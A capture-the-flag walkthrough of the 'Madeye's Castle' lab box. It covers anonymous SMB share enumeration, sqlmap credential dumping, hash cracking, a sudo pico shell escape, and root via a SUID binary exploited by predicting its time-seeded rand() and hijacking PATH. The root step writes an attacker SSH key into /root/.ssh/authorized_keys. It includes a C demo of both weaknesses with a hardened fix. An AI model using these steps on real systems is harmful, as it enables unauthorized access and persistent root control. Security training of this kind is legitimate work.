Link to the CTF: Madeye's Castle

Web Server

Visiting the web page, we see that the default Apache page has been changed.

Checking the source code, we get a hint: a hostname.

After adding that hostname to /etc/hosts, we reach another web page that greets us.

SMB Share

nmap tells us that there's a Samba service running.

I’m gonna use enum4linux-ng.

The interesting parts of its output are the following:

There is a null session vulnerability: the server accepts an anonymous “login” with an empty username and an empty password, so we can list and read shares without credentials.

I then used smbmap to enumerate it further.

smbmap -H 10.10.197.154 -u '' -p '' 

sambashare is readable anonymously. The following command recursively lists everything inside that share:

smbmap -H 10.10.197.154 -u '' -p '' -R sambashare

To download the files, we just use the --download argument:

smbmap -H 10.10.197.154 -u '' -p '' --download sambashare\\.notes.txt
smbmap -H 10.10.197.154 -u '' -p '' --download sambashare\\spellnames.txt

.notes.txt contains the following:

Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.

and spellnames.txt appears to be a wordlist.

SQL Injection

I intercepted the login request and passed it to sqlmap. I'm using sqlmap version 1.5.2#pip.

Fun fact: I had issues with sqlmap. Try updating it or changing some arguments.

sqlmap -r request --level 5 --risk 3 --random-agent -T users --dump

The dumped users table also carries a hint about the hash: “My linux username is my first name, and password uses best64”. So harry is the username and best64 is a John the Ripper rule. Together with the note's “will not rock you”, that tells us rockyou.txt is the wrong wordlist and spellnames.txt from the share is the right one. I use john to crack the hash:

john --rules=best64 -w=./spellnames.txt --format=Raw-SHA512 hash.txt

We can use the cracked credentials to log in via SSH as harry.

Horizontal Privilege Escalation

Checking harry's sudo privileges, we see that we can execute pico as hermonine (the note's “historical text editors” hint points here). pico is nano, and its Ctrl+R then Ctrl+X “Command to execute” prompt runs an arbitrary command, so we can spawn a shell as hermonine from inside the editor.

And then I put my ssh-key in /home/hermonine/.ssh/authorized_keys so I can have a better shell.

Vertical Privilege Escalation

Got stuck here, thinking that I should do something that only hermonine could do.

I checked for SUID files

I used the strings command

and I feel like this binary executes uname -p without specifying the full path to it. We can exploit that by changing the PATH environment variable, the list of directories Linux searches for a command, so that our own uname is found before the real one.

Prepending our working directory to PATH tells Linux to look there first for the uname command the binary executes. Then I create a bash script called uname:

#!/bin/bash
# Fake uname: runs instead of the real one once our directory is first in PATH.
echo "HIJACKED";
whoami; id;

and make it executable

chmod +x uname

But first we have to guess the number the binary asks for. We can actually predict it: the binary seeds rand() with the current time, so a program of our own that seeds with the same time in the same second produces the same number.

#include <stdio.h>
#include <stdlib.h>	/* srand(), rand() */
#include <time.h>

int main(){
	/* Same seed the SUID binary uses: the current second. Run this in the
	 * same second as the binary and rand() yields the number it expects. */
	srand(time(0));
	printf("%d", rand());
	return 0;
}

and compile it

gcc rand.c

OK, so we have confirmed that we can execute commands as root. The easiest way to get a root shell would be to set the SUID bit on /bin/bash, or we can write our key to /root/.ssh/authorized_keys.
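The C program below is an added example, not code from the original writeup or from the room. It puts the two weaknesses used above side by side: the seed prediction (with a search window, so it also works when our clock and the binary's start time differ by a few seconds) and the PATH hijack, reproduced end to end against an unqualified `uname -p` run through the shell. The real binary's prompt and flow are not shown on the page, so `vulnerable_guard()` is a hypothetical reconstruction of “srand(time), compare with rand(), then system("uname -p")”; `path_hijack_demo()` assumes a writable, executable /tmp for its scratch directory.

```c
/* Added example, not code from the original writeup. It models the two
 * weaknesses the writeup exploits in the SUID binary: rand() seeded with the
 * current time (predictable) and `uname -p` run through the shell without an
 * absolute path (PATH hijack). The real binary's prompt and flow are not shown
 * on the page, so vulnerable_guard() is a hypothetical reconstruction.
 * Build: gcc -Wall hijack_demo.c -o hijack_demo && ./hijack_demo */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* First value rand() returns after srand(seed): the number the binary wants. */
int first_rand_for_seed(unsigned int seed) {
    srand(seed);
    return rand();
}

/* Recover the seed that produced `observed` by trying every second in
 * [now - window, now + window]; the window absorbs clock drift and the delay
 * between the binary starting and the predictor running. Returns -1 if none. */
long find_seed(int observed, time_t now, int window) {
    for (long delta = -window; delta <= window; delta++) {
        long candidate = (long)now + delta;
        if (candidate >= 0 && first_rand_for_seed((unsigned int)candidate) == observed)
            return candidate;
    }
    return -1;
}

/* Hypothetical model of the vulnerable check: seed with the current time,
 * compare the user's guess with rand(), and on success run `uname -p` via
 * system(), which lets /bin/sh resolve `uname` through the caller's $PATH. */
int vulnerable_guard(int guess, time_t seed_time, int run_cmd) {
    if (first_rand_for_seed((unsigned int)seed_time) != guess)
        return 0;
    if (run_cmd)
        system("uname -p");                /* hijackable lookup */
    return 1;
}

/* Hardened counterpart for the command step: fixed PATH plus an absolute path,
 * so a `uname` planted by the invoking user is never considered. (The seed
 * should likewise come from /dev/urandom or getrandom(2), not time().) */
void run_uname_safely(void) {
    setenv("PATH", "/usr/bin:/bin", 1);
    system("/usr/bin/uname -p");
}

/* Reproduce the hijack end to end: drop a fake `uname` into a scratch
 * directory under /tmp, prepend that directory to PATH, run the unqualified
 * command the way the vulnerable binary does, and see whose output comes back.
 * Returns 1 if the fake ran, 0 if the real uname ran, -1 if setup failed. */
int path_hijack_demo(void) {
    char dir[] = "/tmp/hijackXXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;
    char script[64];
    snprintf(script, sizeof script, "%s/uname", dir);

    FILE *f = fopen(script, "w");
    if (!f) { rmdir(dir); return -1; }
    fputs("#!/bin/sh\necho HIJACKED\n", f);   /* same idea as the writeup's uname script */
    fclose(f);
    chmod(script, 0755);

    char oldpath[4096] = "";
    const char *old = getenv("PATH");
    if (old) snprintf(oldpath, sizeof oldpath, "%s", old);
    char newpath[4608];
    snprintf(newpath, sizeof newpath, "%s:%s", dir, old ? oldpath : "/usr/bin:/bin");
    setenv("PATH", newpath, 1);             /* prepend our directory to PATH */

    char line[64] = "";
    int result = -1;
    FILE *p = popen("uname -p", "r");       /* unqualified, like the SUID binary */
    if (p) {
        if (fgets(line, sizeof line, p) == NULL) line[0] = '\0';
        pclose(p);
        if (line[0] != '\0')                /* empty output means exec failed */
            result = strncmp(line, "HIJACKED", 8) == 0 ? 1 : 0;
    }

    if (old) setenv("PATH", oldpath, 1);    /* undo our change */
    unlink(script);
    rmdir(dir);
    return result;
}

int main(void) {
    time_t now = time(NULL);
    int predicted = first_rand_for_seed((unsigned int)now);
    printf("seed %ld -> predicted rand() %d\n", (long)now, predicted);
    printf("guard accepts prediction: %d\n", vulnerable_guard(predicted, now, 0));
    printf("PATH hijack result: %d\n", path_hijack_demo());
    return 0;
}
```

`find_seed()` is the part worth keeping for a real engagement: when the binary prints or echoes the number it expects, or rejects a guess, searching a few seconds around our own clock is more reliable than racing to run the predictor in exactly the same second. The hardened `run_uname_safely()` shows the fix a developer would apply: an absolute path and a PATH the invoking user does not control.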

I'm treating this as a penetration test, so I don't want to mess things up more than I should; I'll write my SSH key, being careful to append it to the file rather than overwrite it.

#!/bin/bash
# Replacement uname: the SUID binary runs it as root, so it can append our key.
echo "HIJACKED";
mkdir -p /root/.ssh; chmod 700 /root/.ssh;
echo -e '\necdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFHMnWdBAAvTFNf4U01x9NjPFAbGWj4f/LyeCZPmHQdp/PH/u71OShS7wZREW9WzV73/TGxuwXYnaU1RJL/5wJc= lmao' >> /root/.ssh/authorized_keys
cat /root/.ssh/authorized_keys

Now we can log in as root via SSH with the matching private key:

ssh -i sshkey root@10.10.197.154